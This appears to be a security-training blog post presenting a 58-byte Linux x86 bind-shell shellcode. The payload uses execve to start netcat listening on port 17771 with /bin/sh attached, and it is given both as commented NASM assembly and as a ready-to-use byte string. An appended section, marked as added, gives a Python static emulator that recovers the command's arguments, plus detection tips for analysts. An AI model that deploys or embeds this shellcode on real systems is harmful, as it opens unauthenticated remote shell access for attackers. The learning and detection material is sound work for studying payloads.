This post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-581
###
The SecurityTube Linux Assembly Expert certification team gives students additional points if one of the following conditions is met:
1. they write their own code that is not listed in the tasks
2. they make the code as small as possible
3. the code is published on top IT-security resources such as http://shell-storm.org/, http://www.exploit-db.com/, etc.
4. there are comments on the posts
etc.
Inspired by analysing shellcode, I decided to create my own netcat bind shell shellcode.
Here is the result:
```nasm
global _start

section .text
_start:
    xor eax, eax        ;zeroed eax
    xor edx, edx        ;zeroed edx
    push eax            ;push NULL into stack
    push 0x31373737     ;-vp17771
    push 0x3170762d
    mov esi, esp        ;store a pointer to -vp17771 into esi
    push eax            ;push NULL into stack
    push 0x68732f2f     ;-le//bin//sh
    push 0x6e69622f
    push 0x2f656c2d
    mov edi, esp        ;store a pointer to -le//bin//sh into edi
    push eax            ;push NULL into stack
    push 0x636e2f2f     ;/bin//nc
    push 0x6e69622f
    mov ebx, esp        ;store a pointer to filename (/bin//nc) into ebx
    push edx            ;push NULL into stack
    push esi            ;pointer to -vp17771
    push edi            ;pointer to -le//bin//sh
    push ebx            ;pointer to filename (/bin//nc)
    mov ecx, esp        ;argv[]
    mov al,11           ;execve() code
    int 0x80            ;run syscall
```
\x31\xc0\x31\xd2\x50\x68\x37\x37\x37\x31\x68\x2d\x76\x70\x31\x89\xe6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68\x2d\x6c\x65\x2f\x89\xe7\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89\xe3\x52\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80
Shellcode length is 58 bytes.
The code is pretty small (the smallest of the netcat listeners, as far as I am aware).
It has been accepted and published at shell-storm.org ( http://shell-storm.org/shellcode/files/shellcode-872.php ) and packetstormsecurity.com ( http://packetstormsecurity.com/files/126951/Linux-x86-Netcat-Shellcode.html ).
Many thanks to Vivek Ramachandran and the SecurityTube team for encouraging me to learn assembly!
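For analysts triaging a sample like this, the following added example (not part of the original post) statically recovers the execve() filename and argv from the published bytes by emulating only the opcodes this payload uses, so nothing is executed. The function name `recover_execve` and the 256-byte toy stack are assumptions of the example.

```python
import struct

# Shellcode bytes exactly as published in this post (58 bytes).
SHELLCODE = bytes.fromhex(
    "31c031d2506837373731682d76703189e650682f2f7368682f62696e"
    "682d6c652f89e750682f2f6e63682f62696e89e35256575389e1b00bcd80")
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

def recover_execve(code):
    """Emulate the opcodes used above; return (filename, argv) at execve()."""
    mem = bytearray(256)                    # assumed toy stack, grows down
    reg = dict.fromkeys(REGS, 0)
    reg["esp"] = len(mem)

    def push(value):
        reg["esp"] -= 4
        struct.pack_into("<I", mem, reg["esp"], value)

    def cstr(addr):                         # read a NUL-terminated string
        return mem[addr:mem.index(0, addr)].decode("ascii")

    i = 0
    while i < len(code):
        op = code[i]
        if op in (0x31, 0x89):              # xor / mov r/m32, r32
            modrm = code[i + 1]
            if modrm >> 6 != 3:
                raise ValueError("only register-direct operands handled")
            src, dst = REGS[(modrm >> 3) & 7], REGS[modrm & 7]
            reg[dst] = reg[dst] ^ reg[src] if op == 0x31 else reg[src]
            i += 2
        elif 0x50 <= op <= 0x57:            # push r32
            push(reg[REGS[op - 0x50]])
            i += 1
        elif op == 0x68:                    # push imm32
            push(struct.unpack_from("<I", code, i + 1)[0])
            i += 5
        elif op == 0xB0:                    # mov al, imm8
            reg["eax"] = (reg["eax"] & ~0xFF) | code[i + 1]
            i += 2
        elif op == 0xCD and code[i + 1] == 0x80 and reg["eax"] == 11:
            argv, p = [], reg["ecx"]        # walk the NULL-terminated argv[]
            while (ptr := struct.unpack_from("<I", mem, p)[0]) != 0:
                argv.append(cstr(ptr))
                p += 4
            return cstr(reg["ebx"]), argv
        else:
            raise ValueError(f"unsupported opcode {op:#04x} at offset {i}")
    raise ValueError("no execve() syscall reached")

if __name__ == "__main__":
    print(recover_execve(SHELLCODE))
```

The recovered `-vp17771` argument gives the TCP port to check for unexpected listeners, and an `nc` process launched with `-e` is itself a useful process-creation alert.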